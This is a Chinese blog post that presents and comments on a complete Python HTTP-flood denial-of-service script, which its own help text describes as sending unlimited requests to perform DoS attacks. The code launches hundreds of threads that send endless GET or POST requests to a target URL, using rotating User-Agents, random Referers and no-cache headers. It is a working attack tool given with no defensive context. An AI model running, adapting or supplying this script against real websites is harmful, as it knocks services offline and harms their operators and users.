夕阳无限好,只是近黄昏!

小型的DDOS解析

import requests
import sys
import threading
import random
import re
#用来处理命令行参数的库
import argparse

host=''
headers_useragents = []        #User-Agent代理头部列表
request_counter    = 0         #请求次数
printedMsgs        = []        #输出的信息

def printMsg(msg):
	if msg not in printedMsgs:
		print ("\n"+msg + " after %i requests" % request_counter)
		printedMsgs.append(msg)

def useragent_list():
	global headers_useragents
	headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
	headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
	headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
	headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
	headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
	headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
	headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
	headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
	return(headers_useragents)


	"""
		产生0---》size长度的字符串,字符串的内容由a-z构成的
	"""
def randomString(size):
	out_str = ''
	for i in range(0, size):
		a = random.randint(65, 90)
		out_str += chr(a)  #转为ascii的字符
	return(out_str)

	"""
		初始化头部信息,将其放入additionHeaders这个全局变量当中
	"""
def initHeaders():
	useragent_list()
	global headers_useragents, additionalHeaders
	headers = {
				'User-Agent': random.choice(headers_useragents),  #随机选择一个User-Agent
				'Cache-Control': 'no-cache',
				'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
				'Referer': 'http://www.google.com/?q=' + randomString(random.randint(5,10)),
				'Keep-Alive': str(random.randint(110,120)),  #随机时间
				'Connection': 'keep-alive'
				}

	if additionalHeaders:   #外部如果有自己添加参数的话,需要更新内部的Header
		for header in additionalHeaders:
			headers.update({header.split(":")[0]:header.split(":")[1]})
	return headers

	"""
		处理返回的状态码
	"""
def handleStatusCodes(status_code):
	global request_counter
	sys.stdout.write("\r%i requests has been sent" % request_counter)
	sys.stdout.flush()
	if status_code == 429:  #请求次数太多
			printMsg("You have been throttled")
	if status_code == 500:  #服务器不能服务,没反应
		printedMsg("Status code 500 received")

def sendGET(url):
	global request_counter
	headers = initHeaders()
	try:
		request_counter+=1
		request = requests.get(url, headers=headers)
		# print 'her'
		handleStatusCodes(request.status_code)
	except:
		pass

def sendPOST(url, payload):
	global request_counter
	headers = initHeaders()
	try:
		request_counter+=1
		if payload:      #判断是否有请求负载
			request = requests.post(url, data=payload, headers=headers)
		else:
			request = requests.post(url, headers=headers)
		handleStatusCodes(request.status_code)
	except:
		pass

class SendGETThread(threading.Thread):   #继承原先的threading.Thread类
	def run(self):
		try:
			while True:
				global url
				sendGET(url)
		except:
			pass

class SendPOSTThread(threading.Thread):
	def run(self):
		try:
			while True:
				global url, payload
				sendPOST(url, payload)   #调用外部方法
		except:
			pass


# TODO:
# check if the site stop responding and alert

def main(argv):
	#创建一个解析对象   description=None,    - help时显示的开始文字
	parser = argparse.ArgumentParser(description='Sending unlimited amount of requests in order to perform DoS attacks. Written by Barak Tawily')
	#向该对象中添加你要关注的命令行参数和选项,生成的参数会可以在parser.print_help方法中找到
	parser.add_argument('-g', help='Specify GET request. Usage: -g \'<url>\'')
	parser.add_argument('-p', help='Specify POST request. Usage: -p \'<url>\'')
	parser.add_argument('-d', help='Specify data payload for POST request', default=None)
	parser.add_argument('-ah', help='Specify addtional header/s. Usage: -ah \'Content-type: application/json\' \'User-Agent: Doser\'', default=None, nargs='*')
	parser.add_argument('-t', help='Specify number of threads to be used', default=500, type=int)
	#解析输入的内部参数,即ag内部已经存储有内部参数数据
	args = parser.parse_args()

	global url, payload, additionalHeaders #定义全局变量, 要请求的地址,需要添加的负载,已经请求头
	additionalHeaders = args.ah   #获得外部的请求头
	payload = args.d             #获得外部post的负载参数

	if args.g:  #发送get请求
		url = args.g            
		for i in range(args.t):   #args.t是创建线程的个数,默认是500
			t = SendGETThread()  #调用线程类,发送get请求
			t.start()

	if args.p:    #发送post请求
		url = args.p
		for i in range(args.t):
			t = SendPOSTThread()#     调用线程类,发送get请求
			t.start()
	
	if len(sys.argv)==1:   #如果未输出参数,则输出选项
		parser.print_help()
		exit()
	
if __name__ == "__main__":
   main(sys.argv[1:]) #调用主函数,并把所有参数传到函数中
点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注